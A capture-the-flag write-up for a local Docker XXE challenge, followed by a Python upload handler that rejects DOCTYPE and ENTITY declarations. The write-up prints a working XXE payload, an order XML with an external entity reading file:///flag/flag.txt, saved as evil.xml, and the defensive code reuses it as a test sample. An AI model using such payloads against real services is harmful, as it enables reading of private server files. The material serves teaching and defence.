
Want to run this Docker container locally?
docker run -d -p 9045:80 --name pizza_planet_xxe --restart always joshbeck2024/ctf_local-xxe
For this challenge, we need to craft an XML file that will read /flag/flag.txt.
We are given a template to download, which can be re-uploaded. We just need to modify it to take advantage of external references.
We can test for LFI by modifying MY_ENTITY to include an external reference.
<!DOCTYPE THIS_CAN_BE_ANYTHING [
<!ENTITY MY_ENTITY SYSTEM "file:///flag/flag.txt">
]>
- In the context of an <!ENTITY> declaration in an XML document, the keyword SYSTEM is used to define an external entity. External entities are resources or data that are located outside the XML document and can then be referenced within the document.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test123 [
<!ENTITY myentity SYSTEM "file:///flag/flag.txt">
]>
<order>
<item>
<name>&myentity;</name>
<food_item>Pepperoni with Extra Cheese</food_item>
</item>
<item>
<name>Woody</name>
<food_item>BBQ Chicken</food_item>
</item>
</order>
Name this file evil.xml and upload it to get the flag.
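The defensive counterpart, as an added example that is not part of the original write-up or the challenge's own code: an upload handler that refuses any order containing a DOCTYPE or ENTITY declaration before the parser can act on it, using Python's standard expat bindings. The names parse_order and UnsafeXMLError and the two sample uploads are assumptions constructed for illustration.

```python
import xml.parsers.expat

class UnsafeXMLError(ValueError):
    """Raised when an upload carries a DOCTYPE or ENTITY declaration."""

def parse_order(xml_bytes):
    """Return [(name, food_item), ...]; refuse any DTD before it is processed."""
    items, path, text = [], [], []

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE {name!r} is not allowed in an order")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXMLError(f"ENTITY {name!r} is not allowed in an order")

    def start(tag, attrs):
        path.append(tag)
        text.clear()
        if tag == "item":
            items.append({})

    def end(tag):
        # Keep text only for <name>/<food_item> that sit directly under <item>.
        if tag in ("name", "food_item") and path[-2:-1] == ["item"]:
            items[-1][tag] = "".join(text).strip()
        path.pop()
        text.clear()

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    parser.Parse(xml_bytes, True)
    return [(i.get("name"), i.get("food_item")) for i in items]

# Constructed sample uploads modelled on the challenge template.
SAFE_ORDER = b"""<?xml version="1.0" encoding="UTF-8"?>
<order><item><name>Buzz</name><food_item>Pepperoni with Extra Cheese</food_item></item>
<item><name>Woody</name><food_item>BBQ Chicken</food_item></item></order>"""

XXE_ORDER = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test123 [ <!ENTITY myentity SYSTEM "file:///flag/flag.txt"> ]>
<order><item><name>&myentity;</name><food_item>BBQ Chicken</food_item></item></order>"""

if __name__ == "__main__":
    print(parse_order(SAFE_ORDER))
    try:
        parse_order(XXE_ORDER)
    except UnsafeXMLError as exc:
        print("rejected:", exc)
```

An order form has no legitimate need for a DTD, so rejecting the declaration outright is simpler and safer than trying to filter individual entity URLs.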